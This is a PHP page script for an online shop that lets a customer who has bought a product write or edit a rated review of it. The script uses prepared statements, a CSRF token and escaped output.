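<?php
// review.php: lets a signed-in customer add or edit their review of one product.
//
// Flow: ?product= must name a row in `products`; the customer must have a
// "Completed" order in `my_orders` whose `cart_details` contain that product;
// an existing row in `product_reviews` pre-fills the form and is UPDATEd on
// submit, otherwise a new row is INSERTed. Redirects use meta-refresh because
// header.php has already started output by the time they are needed.
//
// Expects header.php to provide $con (mysqli), $user_id and $company_name —
// presumably taken from the session; confirm against header.php.
session_start();
$page_name = basename($_SERVER['PHP_SELF']);
include("header.php"); ?>
<title><?php echo $company_name; ?> - Review A Product</title>
<?php
// Client-side redirect helper; never returns. When $message is given the target
// is success.php or failure.php, which (per the original code) expect
// $_SESSION["action"] to be set and the message in the m= query parameter.
// The URL is attribute-escaped and the message URL-encoded so neither can
// break out of the meta tag or the query string.
$redirect = static function (string $url, ?string $message = null): void {
    if ($message !== null) {
        // create a session flag to verify the redirect is coming from here
        $_SESSION["action"] = "true";
        $url .= '&m=' . rawurlencode($message);
    }
    echo "<meta http-equiv=\"refresh\" content=\"0; url=" . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . "\">";
    exit();
};

// Only a plain string is usable as a product id; a missing value or an array
// (?product[]=) goes to the home page, the same as an unknown product below.
$product_id = isset($_GET['product']) && is_string($_GET['product']) ? $_GET['product'] : '';
if ($product_id === '') {
    $redirect('index.php');
}

// Resolve the product title. Values are bound as parameters, so no manual
// escaping is applied (escaping before binding stores/queries the backslashes).
$stmt = $con->prepare('SELECT product_title FROM products WHERE product_id=?');
$stmt->bind_param('s', $product_id);
$stmt->execute();
$stmt->store_result();
$stmt->bind_result($product_title);
$product_found = $stmt->num_rows() > 0 && $stmt->fetch();
$stmt->close();
if (!$product_found) {
    $redirect('index.php');
}

$details_url = 'product_details.php?product=' . rawurlencode($product_id);

// The reviewer must have a Completed order containing this product. One join
// replaces the nested per-order loops over my_orders and cart_details and
// reaches the same decision: no such order means no review.
$completed = "Completed";
$stmt = $con->prepare(
    'SELECT 1 FROM my_orders o JOIN cart_details c ON c.order_id = o.order_id'
    . ' WHERE o.user_id=? AND o.status=? AND c.product_id=? LIMIT 1'
);
$stmt->bind_param('sss', $user_id, $completed, $product_id);
$stmt->execute();
$stmt->store_result();
$has_purchased = $stmt->num_rows() > 0;
$stmt->close();
if (!$has_purchased) {
    $redirect("failure.php?u=$details_url", "You must have purchased this item before you can review it.");
}

// Load an existing review so the form edits it instead of adding a duplicate.
// Named columns replace SELECT * so the binding does not depend on column order.
$review_id = 0;
$review = "";
$rating = 0;
$stmt = $con->prepare('SELECT id, review, rating FROM product_reviews WHERE product_id = ? AND user_id = ?');
$stmt->bind_param('ss', $product_id, $user_id);
$stmt->execute();
$stmt->store_result();
$stmt->bind_result($review_id, $review, $rating);
$has_review = $stmt->num_rows() > 0 && $stmt->fetch();
$stmt->close();

// Anti-CSRF token: issued with the form below and required on POST.
if (empty($_SESSION['review_csrf'])) {
    $_SESSION['review_csrf'] = bin2hex(random_bytes(32));
}

$msg = '';
if (isset($_POST["send_review"])) {
    $posted_token = isset($_POST['csrf_token']) && is_string($_POST['csrf_token']) ? $_POST['csrf_token'] : '';
    $posted_review = isset($_POST['review']) && is_string($_POST['review']) ? $_POST['review'] : '';
    $posted_rating = isset($_POST['rating']) && is_string($_POST['rating']) ? $_POST['rating'] : '';

    // Server-side checks; the form's `required` attributes and the
    // "max 240 Characters" hint are only enforced by the browser.
    $errors = [];
    if (!hash_equals($_SESSION['review_csrf'], $posted_token)) {
        $errors[] = 'Your form has expired. Please try again.';
    }
    if (!in_array($posted_rating, ['1', '2', '3', '4', '5'], true)) {
        $errors[] = 'Please choose a rating.';
    }
    if ($posted_review === '') {
        $errors[] = 'Please write your review.';
    } elseif (mb_strlen($posted_review) > 240) {
        $errors[] = 'Your review must be 240 characters or fewer.';
    }

    if ($errors === []) {
        $review = $posted_review;
        $rating = $posted_rating;
        $review_date = date('Y-m-d H:i:s');
        if ($has_review) {
            $stmt = $con->prepare('UPDATE product_reviews SET review = ?,rating = ?, review_date = ? WHERE id = ?');
            $stmt->bind_param('sssi', $review, $rating, $review_date, $review_id);
            $stmt->execute();
            $stmt->close();
            $redirect("success.php?u=$details_url", "Your review was successfully edited.");
        } else {
            // 0 is what the original inserted for the id column — presumably
            // auto-increment; confirm against the table definition.
            $db_id = 0;
            $stmt = $con->prepare('INSERT INTO product_reviews VALUES (?,?,?,?,?,?)');
            $stmt->bind_param('isssss', $db_id, $product_id, $user_id, $review, $rating, $review_date);
            $stmt->execute();
            $stmt->close();
            $redirect("success.php?u=$details_url", "Your review was successfully added.");
        }
    }

    // Re-render the form with what was typed and list the problems.
    $review = $posted_review;
    $rating = $posted_rating;
    foreach ($errors as $error) {
        $msg .= ($msg === '' ? '' : '<br/>') . htmlspecialchars($error, ENT_QUOTES, 'UTF-8');
    }
}
?>

<!-- Title Page -->
	<section class="bg-title-page p-t-40 p-b-50 flex-col-c-m" style="background-image: url(images/banner-min.jpg);">
		<h2 class="l-text2 t-center">
		<div class='space_top'></div>
			Review A Product
		</h2>
	</section>

<br/>
<section class="bgwhite p-t-66 p-b-60">
		<div class="container">
			<div class="row">


				<div class="col-md-8">
					<form class="leave-comment" action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>?product=<?php echo rawurlencode($product_id); ?>" method='post'>
					<input type='hidden' name='csrf_token' value='<?php echo htmlspecialchars($_SESSION['review_csrf'], ENT_QUOTES, 'UTF-8'); ?>'>
					<h2>Review <?php echo htmlspecialchars((string) $product_title, ENT_QUOTES, 'UTF-8'); ?></h2>
						<p>Thank you for taking the time out to review our product. Please fill the form below:</p>
						<h4 class="">
							<?php echo "<br/>$msg"; ?>
						</h4>



						<div class="bo4 of-hidden size15 m-b-20">
							<select class="sizefull s-text7 p-l-22 p-r-22" name="rating" required>
								<option value="">Please Choose A Rating</option>
								<option value="5" <?php if ((string) $rating === '5') { echo 'selected'; } ?>>5 Stars (I love it!)</option>
								<option value="4" <?php if ((string) $rating === '4') { echo 'selected'; } ?>>4 Stars (I like it.)</option>
								<option value="3" <?php if ((string) $rating === '3') { echo 'selected'; } ?>>3 Stars (It was just okay).</option>
								<option value="2" <?php if ((string) $rating === '2') { echo 'selected'; } ?>>2 Stars (I did not like it.)</option>
								<option value="1" <?php if ((string) $rating === '1') { echo 'selected'; } ?>>1 Star (I really did not like it)</option>

							</select>
						</div>

						<!-- Stored reviews are user-supplied text, so they are escaped on the way out. -->
						<textarea class="dis-block s-text7 size20 bo4 p-l-22 p-r-22 p-t-13 m-b-20" placeholder="Your Review (max 240 Characters)" name='review' required><?php echo htmlspecialchars((string) $review, ENT_QUOTES, 'UTF-8'); ?></textarea>

						<div class="w-size25">
							<!-- Button -->
							<button name='send_review' type='submit' class="flex-c-m size2 bg1 bo-rad-23 hov1 m-text3 trans-0-4">
								Send
							</button>
						</div>
					</form>

				</div>
			</div>
		</div>
	</section>
<?php include("footer.php"); ?>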
